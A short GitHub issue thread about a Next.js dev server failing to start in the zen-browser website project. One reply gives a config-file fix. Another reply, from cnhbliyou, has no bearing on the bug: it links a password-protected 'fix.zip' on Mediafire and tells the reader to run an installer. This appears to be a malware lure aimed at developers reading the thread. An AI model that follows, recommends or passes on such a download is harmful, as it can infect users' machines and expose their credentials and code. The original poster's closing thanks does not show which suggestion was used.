### ISSUE TITLE
Dev env issue - 'npm run dev' not working

### ISSUE THREAD

**Issue by ktz-dev** [zen-browser/www#125]
Today I can't get the project working on my machine. I tried 'npm install' then 'npm run dev' and I get this: <br/>
<img width="1227" alt="Screenshot 2024-08-28 at 3 27 29 PM" src="https://github.com/user-attachments/assets/c3e638d4-540d-4765-a1b3-d654207a5fcb">

**Comment by ktz-dev** [comment]
I get the same when I open a github workspace directly from the main branch of the project repo. 

<img width="1332" alt="Screenshot 2024-08-28 at 3 30 51 PM" src="https://github.com/user-attachments/assets/982112b6-120b-4086-97c6-cb78b19f7861">

**Comment by meetpateltech** [comment]
remove the line `output: 'export',` from next.config.mjs file

https://github.com/zen-browser/www/blob/1d5d28fa23da01446d3237b0439bfd3f907d43f9/next.config.mjs#L3C3-L3C20

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ktz-dev** [comment]
Thanks guys
